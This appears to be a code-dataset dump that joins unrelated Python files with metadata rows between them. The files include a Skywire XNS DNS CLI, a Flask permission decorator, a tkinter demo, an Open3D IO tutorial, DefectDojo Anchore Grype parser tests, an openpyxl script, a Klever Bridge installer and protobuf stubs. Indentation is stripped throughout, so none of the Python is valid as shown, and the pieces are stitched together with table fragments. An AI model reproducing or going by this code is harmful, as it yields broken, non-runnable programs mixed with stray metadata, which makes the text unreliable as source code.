# Install skywire-xns on Linux running python 2.7/3.0 and python-zmq
#
#
################################################################################
import readline
import sys
from optparse import OptionParser
import threading
import os
import re
from config import *
from server import *
from database import *
from dns_module import *
class App(object):
def __init__(self):
self.parser = OptionParser(version="%prog 0.1")
def parse_commandline(self):
self.parser.add_option("-d",
"--daemon",
action="store_true",
dest="daemon_mode",
default=False,
help="Runs server in daemon mode" )
(options, args) = self.parser.parse_args()
if options.daemon_mode:
print("in daemon mode")
os.spawnl(os.P_NOWAIT, "touch", "touch", "./daemon")
return True
return False
def print_help(self):
commands = {
"help": "print help commands",
"daemon": "detaches the server and exits this process",
"connect": "connect to another node",
"nodes": "print all known nodes",
"domains": "print all known domains",
"register": "register a domain with all known nodes",
"quit": "exit this process"
}
self.parser.print_help()
print("\n\tCLI commands:")
for (command, explanaiton) in sorted( commands.items() ):
print( "%-10s %s" % (command, explanaiton) )
def start_daemon(self):
proc_id = os.spawnl(os.P_NOWAIT,
sys.executable + " " + sys.argv[0],
"-d")
print("process id: %s" % proc_id)
self.quit()
def start_server(self):
self.db = Database()
self.srv = Server(self.db)
self.dns = DNSModule(self.db)
self.dns.start()
self.srv.start()
def stop(self):
self.dns.stop()
self.srv.stop()
self.srv.join()
self.dns.join()
sys.exit()
def run(self):
daemon_mode = self.parse_commandline()
self.start_server()
if not daemon_mode:
print( """\033[32mWelcome to the Skywire XNS CLI client.
To run in daemon mode, use '-d' to start or type 'daemon'.
To see command list, type 'help'\033[0m""" )
while True:
try:
io = raw_input("==>> ")
if io == "help":
self.print_help()
elif io == "daemon":
self.start_daemon()
elif io == "connect":
server = raw_input("server:")
port = raw_input("port[%s]:" % default_port)
try:
port = int(port)
except:
port = default_port
self.srv.add_node(server, port)
elif io == "nodes":
self.db.print_nodes()
elif io == "domains":
self.db.print_domains()
elif io == "register":
domain = raw_input("domain:")
ip = raw_input("IP:")
ttl = int(raw_input("TTL:"))
key = "" # not yet implemented, read key from file
self.srv.register_domain(domain, ip, key, ttl)
elif io == "quit":
self.stop()
else:
print("Didn't recognize command. "
"Please retry or type 'help'")
except EOFError:
self.stop()
if __name__ == "__main__":
app = App()
app.run()
| 31.816794 | 80 | 0.440019 |
8f04ca53407b16d120f95f48ccd3d072d1a3fbab | 507 | py | Python | back/api_1_0/decorators.py | aninstein/sex_code_blog | 483fcb566f2873204e545db2e4688dba3bee9db9 | [
"BSD-2-Clause"
] | 116 | 2019-09-19T01:00:48.000Z | 2022-03-16T08:52:15.000Z | back/api_1_0/decorators.py | aninstein/sex_code_blog | 483fcb566f2873204e545db2e4688dba3bee9db9 | [
"BSD-2-Clause"
] | 13 | 2019-08-13T14:39:21.000Z | 2022-03-22T02:36:46.000Z | back/api_1_0/decorators.py | aninstein/sex_code_blog | 483fcb566f2873204e545db2e4688dba3bee9db9 | [
"BSD-2-Clause"
] | 30 | 2019-08-13T10:13:07.000Z | 2022-01-19T09:50:31.000Z | # -*- coding: utf-8 -*-
from functools import wraps
from flask import g
from .errors import forbidden
def permission_required(permission):
"""
用于权限检测(rbac?)
:param permission:
:return:
"""
def decorator(f):
@wraps(f)
def decorator_function(*args, **kwargs):
if not g.current_user.can(permission):
return forbidden('Insufficient permissions')
return f(*args, **kwargs)
return decorator_function
return decorator
| 22.043478 | 60 | 0.617357 |
3095b6f70cdbecb46b9230237cd661ca671e711d | 444 | py | Python | projects/kc_projects/height_conv.py | nduprincekc/python-mini-projects | 5501399694ca2361f251c6190a1e450011101477 | [
"MIT"
] | null | null | null | projects/kc_projects/height_conv.py | nduprincekc/python-mini-projects | 5501399694ca2361f251c6190a1e450011101477 | [
"MIT"
] | null | null | null | projects/kc_projects/height_conv.py | nduprincekc/python-mini-projects | 5501399694ca2361f251c6190a1e450011101477 | [
"MIT"
] | null | null | null | import tkinter
from tkinter import Tk,Label,DoubleVar,Entry
window = Tk()
window.configure(background= 'yellow')
#print(window)
#window.size = 34,1112
window.geometry('323x222') # setting the width and the height of the app
window.title('kc app') # title of the app
window.resizable(width=False, height=False)
ft_lbl = Label(window,text= 'okk', bg ='black', fg = 'white', width = 12)
ft_lbl.grid(column=111,row=10,padx=15)
window.mainloop()
| 27.75 | 73 | 0.736486 |
9a9851042acfe8fea516877c0ce6f350c1c931f1 | 2,802 | py | Python | Docs_Geometry_File_IO.py | zhy29563/Tutorial_Open3D | 58d11e5673783855bae267373919355d5085fc24 | [
"MIT"
] | 2 | 2021-11-09T01:59:36.000Z | 2021-12-20T07:04:02.000Z | Docs_Geometry_File_IO.py | zhy29563/Tutorial_Open3D | 58d11e5673783855bae267373919355d5085fc24 | [
"MIT"
] | null | null | null | Docs_Geometry_File_IO.py | zhy29563/Tutorial_Open3D | 58d11e5673783855bae267373919355d5085fc24 | [
"MIT"
] | 1 | 2021-11-09T01:59:38.000Z | 2021-11-09T01:59:38.000Z | import open3d as o3d
# http://www.open3d.org/docs/release/tutorial/geometry/file_io.html
########################################################################################################################
# 1. Point cloud
########################################################################################################################
'''
reads a point cloud from a file. It tries to decode the file based on the extension name
Format Description
xyz Each line contains [x, y, z], where x, y, z are the 3D coordinates
xyzn Each line contains [x, y, z, nx, ny, nz], where nx, ny, nz are the normals
xyzrgb Each line contains [x, y, z, r, g, b], where r, g, b are in floats of range [0, 1]
pts The first line is an integer representing the number of points. Each subsequent line contains [x, y, z, i,
r, g, b], where r, g, b are in uint8
ply See Polygon File Format, the ply file can contain both point cloud and mesh data
(http://paulbourke.net/dataformats/ply/)
pcd See Point Cloud Data(http://pointclouds.org/documentation/tutorials/pcd_file_format.html)
It’s also possible to specify the file type explicitly. In this case, the file extension will be ignored.
pcd = o3d.io.read_point_cloud("../../test_data/my_points.txt", format='xyz')
'''
print("Testing IO for point cloud ...")
pcd = o3d.io.read_point_cloud("test_data/fragment.pcd")
print(pcd)
o3d.io.write_point_cloud("copy_of_fragment.pcd", pcd)
########################################################################################################################
# 2. Mesh
########################################################################################################################
'''
By default, Open3D tries to infer the file type by the filename extension.
The following mesh file types are supported:
Format Description
ply See Polygon File Format, the ply file can contain both point cloud and mesh data
stl See StereoLithography
obj See Object Files
off See Object File Format
gltf/glb See GL Transmission Format
'''
print("Testing IO for meshes ...")
mesh = o3d.io.read_triangle_mesh("test_data/knot.ply")
print(mesh)
o3d.io.write_triangle_mesh("copy_of_knot.ply", mesh)
########################################################################################################################
# 3. Image
########################################################################################################################
'''Both jpg and png image files are supported.'''
print("Testing IO for images ...")
img = o3d.io.read_image("test_data/lena_color.jpg")
print(img)
o3d.io.write_image("copy_of_lena_color.jpg", img)
| 50.945455 | 120 | 0.507138 |
3d762ad8d0287629c748ebc3754c1f7d30b9cd50 | 804 | py | Python | django_comments_xtd/__init__.py | rockmaga/django-comments-xtd | 29a49f29fddc0ec16bdfc77e16b46d97e83d2363 | [
"BSD-2-Clause"
] | null | null | null | django_comments_xtd/__init__.py | rockmaga/django-comments-xtd | 29a49f29fddc0ec16bdfc77e16b46d97e83d2363 | [
"BSD-2-Clause"
] | null | null | null | django_comments_xtd/__init__.py | rockmaga/django-comments-xtd | 29a49f29fddc0ec16bdfc77e16b46d97e83d2363 | [
"BSD-2-Clause"
] | null | null | null | from django.utils.module_loading import import_string
import django_comments
from django_comments.feeds import LatestCommentFeed
from django_comments.signals import comment_was_posted
default_app_config = 'django_comments_xtd.apps.CommentsXtdConfig'
def get_model():
from django_comments_xtd.conf import settings
return import_string(settings.COMMENTS_XTD_MODEL)
def get_form():
from django_comments_xtd.conf import settings
return import_string(settings.COMMENTS_XTD_FORM_CLASS)
VERSION = (2, 2, 1, 'f', 0) # following PEP 440
def get_version():
version = '%s.%s' % (VERSION[0], VERSION[1])
if VERSION[2]:
version = '%s.%s' % (version, VERSION[2])
if VERSION[3] != 'f':
version = '%s%s%s' % (version, VERSION[3], VERSION[4])
return version
| 25.935484 | 65 | 0.722637 |
f1f301a916ed06865cd685cc71b1cc7a079a8cc8 | 15,112 | py | Python | unittests/tools/test_anchore_grype_parser.py | mtcolman/django-DefectDojo | 76175aca446e077884bdb5e1d8e2a671a0840775 | [
"BSD-3-Clause"
] | 2 | 2022-03-29T11:37:23.000Z | 2022-03-31T18:32:35.000Z | unittests/tools/test_anchore_grype_parser.py | mtcolman/django-DefectDojo | 76175aca446e077884bdb5e1d8e2a671a0840775 | [
"BSD-3-Clause"
] | 39 | 2022-01-13T23:52:59.000Z | 2022-03-28T21:22:27.000Z | unittests/tools/test_anchore_grype_parser.py | mtcolman/django-DefectDojo | 76175aca446e077884bdb5e1d8e2a671a0840775 | [
"BSD-3-Clause"
] | null | null | null | from ..dojo_test_case import DojoTestCase
from dojo.models import Finding, Test
from dojo.tools.anchore_grype.parser import AnchoreGrypeParser
class TestAnchoreGrypeParser(DojoTestCase):
def test_parser_has_no_findings(self):
testfile = open("unittests/scans/anchore_grype/no_vuln.json")
parser = AnchoreGrypeParser()
findings = parser.get_findings(testfile, Test())
testfile.close()
self.assertEqual(0, len(findings))
def test_parser_has_many_findings(self):
found = False
testfile = open("unittests/scans/anchore_grype/many_vulns.json")
parser = AnchoreGrypeParser()
findings = parser.get_findings(testfile, Test())
testfile.close()
self.assertEqual(1509, len(findings))
for finding in findings:
self.assertIn(finding.severity, Finding.SEVERITIES)
self.assertIsNotNone(finding.cve)
if finding.vuln_id_from_tool == "CVE-2011-3389":
self.assertEqual("CVE-2011-3389", finding.cve)
self.assertEqual("Medium", finding.severity)
self.assertEqual("libgnutls-openssl27", finding.component_name)
self.assertEqual("3.6.7-4+deb10u5", finding.component_version)
found = True
break
self.assertTrue(found)
def test_grype_parser_with_one_criticle_vuln_has_one_findings(self):
found = False
testfile = open("unittests/scans/anchore_grype/many_vulns2.json")
parser = AnchoreGrypeParser()
findings = parser.get_findings(testfile, Test())
testfile.close()
self.assertEqual(1567, len(findings))
for finding in findings:
self.assertIn(finding.severity, Finding.SEVERITIES)
self.assertIsNotNone(finding.cve)
if finding.vuln_id_from_tool == "CVE-2019-9192":
self.assertEqual("CVE-2019-9192", finding.cve)
self.assertEqual("libc6-dev", finding.component_name)
self.assertEqual("2.28-10", finding.component_version)
self.assertEqual("Info", finding.severity)
found = True
break
self.assertTrue(found)
def test_grype_parser_with_many_vulns3(self):
found = False
testfile = open("unittests/scans/anchore_grype/many_vulns3.json")
parser = AnchoreGrypeParser()
findings = parser.get_findings(testfile, Test())
testfile.close()
self.assertEqual(327, len(findings))
for finding in findings:
self.assertIn(finding.severity, Finding.SEVERITIES)
self.assertIsNotNone(finding.cve)
if finding.vuln_id_from_tool == "CVE-2011-3389":
self.assertEqual("CVE-2011-3389", finding.cve)
self.assertEqual("Medium", finding.severity)
self.assertEqual("libgnutls30", finding.component_name)
self.assertEqual("3.6.7-4+deb10u5", finding.component_version)
found = True
break
self.assertTrue(found)
def test_grype_parser_with_new_matcher_list(self):
found = False
testfile = open("unittests/scans/anchore_grype/many_vulns4.json")
parser = AnchoreGrypeParser()
findings = parser.get_findings(testfile, Test())
testfile.close()
self.assertEqual(9, len(findings))
for finding in findings:
self.assertIn(finding.severity, Finding.SEVERITIES)
self.assertIsNotNone(finding.cve)
if finding.vuln_id_from_tool == "CVE-1999-1338":
self.assertEqual("CVE-1999-1338", finding.cve)
self.assertEqual("Medium", finding.severity)
self.assertTrue("javascript-matcher" in finding.description)
self.assertEqual("delegate", finding.component_name)
self.assertEqual("3.2.0", finding.component_version)
found = True
self.assertTrue(found)
def test_check_all_fields(self):
testfile = open("unittests/scans/anchore_grype/check_all_fields.json")
parser = AnchoreGrypeParser()
findings = parser.get_findings(testfile, Test())
testfile.close()
self.assertEqual(5, len(findings))
finding = findings[0]
self.assertEqual('CVE-2004-0971 in libgssapi-krb5-2:1.17-3+deb10u3', finding.title)
description = '''**Vulnerability Id:** CVE-2004-0971
**Vulnerability Namespace:** debian:10
**Related Vulnerability Description:** The krb5-send-pr script in the kerberos5 (krb5) package in Trustix Secure Linux 1.5 through 2.1, and possibly other operating systems, allows local users to overwrite files via a symlink attack on temporary files.
**Matcher:** dpkg-matcher
**Package URL:** pkg:deb/debian/libgssapi-krb5-2@1.17-3+deb10u3?arch=amd64'''
self.assertEqual(description, finding.description)
self.assertEqual('CVE-2004-0971', finding.cve)
self.assertEqual(1352, finding.cwe)
self.assertIsNone(finding.cvssv3)
self.assertIsNone(finding.cvssv3_score)
self.assertEqual('Info', finding.severity)
self.assertIsNone(finding.mitigation)
references = '''**Vulnerability Datasource:** https://security-tracker.debian.org/tracker/CVE-2004-0971
**Related Vulnerability Datasource:** https://nvd.nist.gov/vuln/detail/CVE-2004-0971
**Related Vulnerability URLs:**
- http://www.securityfocus.com/bid/11289
- http://www.gentoo.org/security/en/glsa/glsa-200410-24.xml
- http://www.redhat.com/support/errata/RHSA-2005-012.html
- http://www.trustix.org/errata/2004/0050
- http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=136304
- https://exchange.xforce.ibmcloud.com/vulnerabilities/17583
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10497
- https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E'''
self.assertEqual(references, finding.references)
self.assertEqual('libgssapi-krb5-2', finding.component_name)
self.assertEqual('1.17-3+deb10u3', finding.component_version)
self.assertEqual('CVE-2004-0971', finding.vuln_id_from_tool)
self.assertEqual(['dpkg'], finding.tags)
self.assertEqual(1, finding.nb_occurences)
finding = findings[1]
self.assertEqual('CVE-2021-32626 in redis:4.0.2', finding.title)
description = '''**Vulnerability Id:** CVE-2021-32626
**Vulnerability Namespace:** nvd
**Vulnerability Description:** Redis is an open source, in-memory database that persists on disk. In affected versions specially crafted Lua scripts executing in Redis can cause the heap-based Lua stack to be overflowed, due to incomplete checks for this condition. This can result with heap corruption and potentially remote code execution. This problem exists in all versions of Redis with Lua scripting support, starting from 2.6. The problem is fixed in versions 6.2.6, 6.0.16 and 5.0.14. For users unable to update an additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from executing Lua scripts. This can be done using ACL to restrict EVAL and EVALSHA commands.
**Matchers:**
- python-matcher
- python2-matcher
**Package URL:** pkg:pypi/redis@4.0.2'''
self.assertEqual(description, finding.description)
self.assertEqual('CVE-2021-32626', finding.cve)
self.assertEqual(1352, finding.cwe)
self.assertEqual('CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H', finding.cvssv3)
self.assertEqual('High', finding.severity)
mitigation = '''Upgrade to version:
- fix_1
- fix_2'''
self.assertEqual(mitigation, finding.mitigation)
references = '''**Vulnerability Datasource:** https://nvd.nist.gov/vuln/detail/CVE-2021-32626
**Vulnerability URLs:**
- https://github.com/redis/redis/commit/666ed7facf4524bf6d19b11b20faa2cf93fdf591
- https://github.com/redis/redis/security/advisories/GHSA-p486-xggp-782c
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VL5KXFN3ATM7IIM7Q4O4PWTSRGZ5744Z/
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HTYQ5ZF37HNGTZWVNJD3VXP7I6MEEF42/
- https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E
- https://security.netapp.com/advisory/ntap-20211104-0003/
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WR5WKJWXD4D6S3DJCZ56V74ESLTDQRAB/
- https://www.debian.org/security/2021/dsa-5001'''
self.assertEqual(references, finding.references)
self.assertEqual('redis', finding.component_name)
self.assertEqual('4.0.2', finding.component_version)
self.assertEqual('CVE-2021-32626', finding.vuln_id_from_tool)
self.assertEqual(['python', 'python2'], finding.tags)
self.assertEqual(1, finding.nb_occurences)
finding = findings[2]
self.assertEqual('CVE-2021-33574 in libc-bin:2.28-10', finding.title)
description = '''**Vulnerability Id:** CVE-2021-33574
**Vulnerability Namespace:** debian:10
**Related Vulnerability Description:** The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.
**Matcher:** dpkg-matcher
**Package URL:** pkg:deb/debian/libc-bin@2.28-10?arch=amd64'''
self.assertEqual(description, finding.description)
self.assertEqual('CVE-2021-33574', finding.cve)
self.assertEqual(1352, finding.cwe)
self.assertEqual('CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H', finding.cvssv3)
self.assertEqual('Critical', finding.severity)
self.assertIsNone(finding.mitigation)
references = '''**Vulnerability Datasource:** https://security-tracker.debian.org/tracker/CVE-2021-33574
**Related Vulnerability Datasource:** https://nvd.nist.gov/vuln/detail/CVE-2021-33574
**Related Vulnerability URLs:**
- https://sourceware.org/bugzilla/show_bug.cgi?id=27896
- https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/
- https://security.netapp.com/advisory/ntap-20210629-0005/
- https://security.gentoo.org/glsa/202107-07
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/'''
self.assertEqual(references, finding.references)
self.assertEqual('libc-bin', finding.component_name)
self.assertEqual('2.28-10', finding.component_version)
self.assertEqual('CVE-2021-33574', finding.vuln_id_from_tool)
self.assertEqual(['dpkg'], finding.tags)
self.assertEqual(1, finding.nb_occurences)
finding = findings[3]
self.assertEqual('CVE-2021-33574 in libc6:2.28-10', finding.title)
description = '''**Vulnerability Id:** CVE-2021-33574
**Vulnerability Namespace:** debian:10
**Related Vulnerability Description:** The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.
**Matcher:** dpkg-matcher
**Package URL:** pkg:deb/debian/libc6@2.28-10?arch=amd64'''
self.assertEqual(description, finding.description)
self.assertEqual('CVE-2021-33574', finding.cve)
self.assertEqual(1352, finding.cwe)
self.assertEqual('CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H', finding.cvssv3)
self.assertEqual('Critical', finding.severity)
self.assertIsNone(finding.mitigation)
references = '''**Vulnerability Datasource:** https://security-tracker.debian.org/tracker/CVE-2021-33574
**Related Vulnerability Datasource:** https://nvd.nist.gov/vuln/detail/CVE-2021-33574
**Related Vulnerability URLs:**
- https://sourceware.org/bugzilla/show_bug.cgi?id=27896
- https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/
- https://security.netapp.com/advisory/ntap-20210629-0005/
- https://security.gentoo.org/glsa/202107-07
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/'''
self.assertEqual(references, finding.references)
self.assertEqual('libc6', finding.component_name)
self.assertEqual('2.28-10', finding.component_version)
self.assertEqual('CVE-2021-33574', finding.vuln_id_from_tool)
self.assertEqual(['dpkg'], finding.tags)
self.assertEqual(1, finding.nb_occurences)
finding = findings[4]
self.assertEqual('CVE-2021-44420 in Django:3.2.9', finding.title)
description = '''**Vulnerability Id:** GHSA-v6rh-hp5x-86rv
**Vulnerability Namespace:** github:python
**Vulnerability Description:** Potential bypass of an upstream access control based on URL paths in Django
**Related Vulnerability Id:** CVE-2021-44420
**Related Vulnerability Description:** In Django 2.2 before 2.2.25, 3.1 before 3.1.14, and 3.2 before 3.2.10, HTTP requests for URLs with trailing newlines could bypass upstream access control based on URL paths.
**Matcher:** python-matcher
**Package URL:** pkg:pypi/Django@3.2.9'''
self.assertEqual(description, finding.description)
self.assertEqual('CVE-2021-44420', finding.cve)
self.assertEqual(1352, finding.cwe)
self.assertEqual('CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L', finding.cvssv3)
self.assertEqual('High', finding.severity)
mitigation = 'Upgrade to version: 3.2.10'
self.assertEqual(mitigation, finding.mitigation)
references = '''**Vulnerability Datasource:** https://github.com/advisories/GHSA-v6rh-hp5x-86rv
**Related Vulnerability Datasource:** https://nvd.nist.gov/vuln/detail/CVE-2021-44420
**Related Vulnerability URLs:**
- https://docs.djangoproject.com/en/3.2/releases/security/
- https://www.openwall.com/lists/oss-security/2021/12/07/1
- https://www.djangoproject.com/weblog/2021/dec/07/security-releases/
- https://groups.google.com/forum/#!forum/django-announce'''
self.assertEqual(references, finding.references)
self.assertEqual('Django', finding.component_name)
self.assertEqual('3.2.9', finding.component_version)
self.assertEqual('GHSA-v6rh-hp5x-86rv', finding.vuln_id_from_tool)
self.assertEqual(['python'], finding.tags)
self.assertEqual(2, finding.nb_occurences)
| 59.731225 | 727 | 0.712149 |
6e520a6e43ff993b8d0a45bc164c430d25358e15 | 180 | py | Python | tutor_scheduler/scheduler/admin.py | tylertaewook/tutor-scheduler-django | 5d767fe548960952ac9deae25c00aa1ba98a77ac | [
"MIT"
] | 1 | 2021-12-14T04:49:05.000Z | 2021-12-14T04:49:05.000Z | tutor_scheduler/scheduler/admin.py | tylertaewook/tutor-scheduler-django | 5d767fe548960952ac9deae25c00aa1ba98a77ac | [
"MIT"
] | 5 | 2022-01-27T17:42:55.000Z | 2022-03-28T17:30:47.000Z | tutor_scheduler/scheduler/admin.py | tylertaewook/tutor-scheduler-django | 5d767fe548960952ac9deae25c00aa1ba98a77ac | [
"MIT"
] | null | null | null | from django.contrib import admin
from tutor_scheduler.scheduler.models import Issue, Session
# Register your models here.
admin.site.register(Session)
admin.site.register(Issue)
| 22.5 | 59 | 0.822222 |
b4e18546fd3008b35405e6a4ede5154374d90c2b | 1,348 | py | Python | aalh_iit_buildings_011/populate-cov-long-lat.py | johndewees/iitmigration | 4dadfbecda719d6e7d60af076a231aedec3c862f | [
"Unlicense"
] | null | null | null | aalh_iit_buildings_011/populate-cov-long-lat.py | johndewees/iitmigration | 4dadfbecda719d6e7d60af076a231aedec3c862f | [
"Unlicense"
] | null | null | null | aalh_iit_buildings_011/populate-cov-long-lat.py | johndewees/iitmigration | 4dadfbecda719d6e7d60af076a231aedec3c862f | [
"Unlicense"
] | null | null | null | from openpyxl import load_workbook
import re
filename = 'aalh_iit_buildings_011.xlsx'
wb = load_workbook(filename)
ws = wb['Metadata Template']
minimumcol = 8
maximumcol = 8
minimumrow = 7
maximumrow = 1357
iterationrow = 7
desccol = 8
covcol = 10
latcol = 11
longcol = 12
for row in ws.iter_rows(min_row=minimumrow, min_col=minimumcol, max_row=maximumrow, max_col=maximumcol):
testvar = ws.cell(row=iterationrow, column=desccol).value
for cell in row:
if testvar == None:
continue
elif testvar.find('Old Main') != -1:
continue
elif testvar.find('Main Library') != -1:
ws.cell(row=iterationrow, column=covcol).value = '325 Michigan Street'
ws.cell(row=iterationrow, column=latcol).value = '41.654358'
ws.cell(row=iterationrow, column=longcol).value = '-83.539662'
print(iterationrow,'MAIN LIBRARY')
elif testvar.find('West Toledo') != -1:
ws.cell(row=iterationrow, column=covcol).value = '1320 West Sylvania Avenue'
ws.cell(row=iterationrow, column=latcol).value = '41.69297'
ws.cell(row=iterationrow, column=longcol).value = '-83.572885'
print(iterationrow,'WEST TOLEDO')
iterationrow = iterationrow + 1
#wb.save("aalh_iit_buildings_011.xlsx") | 36.432432 | 105 | 0.646142 |
57032d6549fe9dda319061a782e2638724ecbfc0 | 5,161 | py | Python | klever/deploys/install_klever_bridge.py | PRITI1999/klever | ac80edf4301c15f6b63e35837f4ffbf7e3e68809 | [
"Apache-2.0"
] | 1 | 2021-01-09T08:44:37.000Z | 2021-01-09T08:44:37.000Z | klever/deploys/install_klever_bridge.py | Abhik1998/klever | 827bbd31b29e213bf74cb1d1b158153e62a2933e | [
"Apache-2.0"
] | 3 | 2021-03-19T09:15:16.000Z | 2021-09-22T19:24:40.000Z | klever/deploys/install_klever_bridge.py | Abhik1998/klever | 827bbd31b29e213bf74cb1d1b158153e62a2933e | [
"Apache-2.0"
] | null | null | null | #
# Copyright (c) 2018 ISP RAS (http://www.ispras.ru)
# Ivannikov Institute for System Programming of the Russian Academy of Sciences
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import shutil
import sys
from klever.deploys.utils import Cd, execute_cmd, get_logger, start_services, stop_services, get_media_user
# This function includes common actions for both development and production Klever Bridge.
def _install_klever_bridge(logger):
logger.info('Update translations')
execute_cmd(logger, sys.executable, './manage.py', 'compilemessages')
logger.info('Migrate database')
execute_cmd(logger, sys.executable, './manage.py', 'migrate')
logger.info('Populate database')
execute_cmd(logger, sys.executable, './manage.py', 'createuser',
'--username', 'admin', '--password', 'admin',
'--staff', '--superuser')
execute_cmd(logger, sys.executable, './manage.py', 'createuser',
'--username', 'manager', '--password', 'manager',
'--role', '2')
execute_cmd(logger, sys.executable, './manage.py', 'createuser',
'--username', 'service', '--password', 'service',
'--role', '4')
execute_cmd(logger, sys.executable, './manage.py', 'populate', '--all')
def install_klever_bridge_development(logger, src_dir):
logger.info('Install/update development Klever Bridge')
services = ('klever-bridge-development', 'klever-celery-development', 'klever-celerybeat-development')
stop_services(logger, services)
with Cd(os.path.join(src_dir, 'bridge')):
_install_klever_bridge(logger)
start_services(logger, services)
def install_klever_bridge_production(logger, src_dir, deploy_dir, populate_just_production_presets=True):
logger.info('Install/update production Klever Bridge')
services = ('nginx', 'klever-bridge', 'klever-celery', 'klever-celerybeat')
stop_services(logger, services)
logger.info('Copy Klever Bridge configuration file for NGINX')
copy_from = os.path.join(src_dir, 'bridge/conf/nginx')
if os.path.exists('/etc/nginx/sites-enabled'):
shutil.copy(copy_from, '/etc/nginx/sites-enabled/klever-bridge.conf')
else:
shutil.copy(copy_from, '/etc/nginx/conf.d/klever-bridge.conf')
logger.info('Install/update Klever Bridge source/binary code')
shutil.rmtree('/var/www/klever-bridge', ignore_errors=True)
shutil.copytree(os.path.join(src_dir, 'bridge'), '/var/www/klever-bridge/bridge',
ignore=shutil.ignore_patterns('test_files'))
shutil.copytree(os.path.join(src_dir, 'presets'), '/var/www/klever-bridge/presets')
logger.info('Prepare media directory')
media = '/var/www/klever-bridge/bridge/media'
media_real = os.path.join(os.path.realpath(deploy_dir), 'klever-media')
shutil.rmtree(media)
execute_cmd(logger, 'mkdir', '-p', media_real)
execute_cmd(logger, 'ln', '-s', '-T', media_real, media)
with Cd('/var/www/klever-bridge/bridge'):
with open('bridge/settings.py', 'w') as fp:
fp.write('from bridge.{0} import *\n'.format('production'))
if not populate_just_production_presets:
fp.write('POPULATE_JUST_PRODUCTION_PRESETS = False\n')
_install_klever_bridge(logger)
logger.info('Collect static files')
execute_cmd(logger, sys.executable, './manage.py', 'collectstatic', '--noinput')
# Make available data from media, logs and static for its actual user.
media_user = get_media_user(logger)
user_group = '{}:{}'.format(media_user, media_user)
execute_cmd(logger, 'chown', '-R', user_group, media_real)
execute_cmd(logger, 'chown', '-R', user_group, '/var/www/klever-bridge/bridge/logs')
execute_cmd(logger, 'chown', '-R', user_group, '/var/www/klever-bridge/bridge/static')
# Try to add httpd_t to the list of permissive domains.
try:
execute_cmd(logger, 'semanage', 'permissive', '-a', 'httpd_t')
except:
pass
start_services(logger, services)
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--development', default=False, action='store_true')
parser.add_argument('--source-directory', default='klever')
parser.add_argument('--deployment-directory', default='klever-inst')
args = parser.parse_args()
if args.development:
install_klever_bridge_development(get_logger(__name__), args.source_directory)
else:
install_klever_bridge_production(get_logger(__name__), args.source_directory, args.deployment_directory)
if __name__ == '__main__':
main()
| 39.7 | 112 | 0.692889 |
e3e9e0844e9b768dee82efb822a5b0c842dd3612 | 3,144 | py | Python | pogo/POGOProtos_o/Networking/Requests/Messages/UseItemPotionMessage_pb2.py | josenavarro-famoco/flask-pg | 501f8561b3532d0c8b122128384d3e855f0f6cb4 | [
"MIT"
] | 183 | 2016-07-26T11:43:40.000Z | 2022-03-01T07:40:19.000Z | pogo/POGOProtos_o/Networking/Requests/Messages/UseItemPotionMessage_pb2.py | josenavarro-famoco/flask-pg | 501f8561b3532d0c8b122128384d3e855f0f6cb4 | [
"MIT"
] | 60 | 2016-07-26T18:07:05.000Z | 2017-05-22T12:09:55.000Z | pogo/POGOProtos_o/Networking/Requests/Messages/UseItemPotionMessage_pb2.py | josenavarro-famoco/flask-pg | 501f8561b3532d0c8b122128384d3e855f0f6cb4 | [
"MIT"
] | 58 | 2016-07-26T11:54:07.000Z | 2022-03-01T09:17:09.000Z | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Networking/Requests/Messages/UseItemPotionMessage.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from POGOProtos.Inventory.Item import ItemId_pb2 as POGOProtos_dot_Inventory_dot_Item_dot_ItemId__pb2
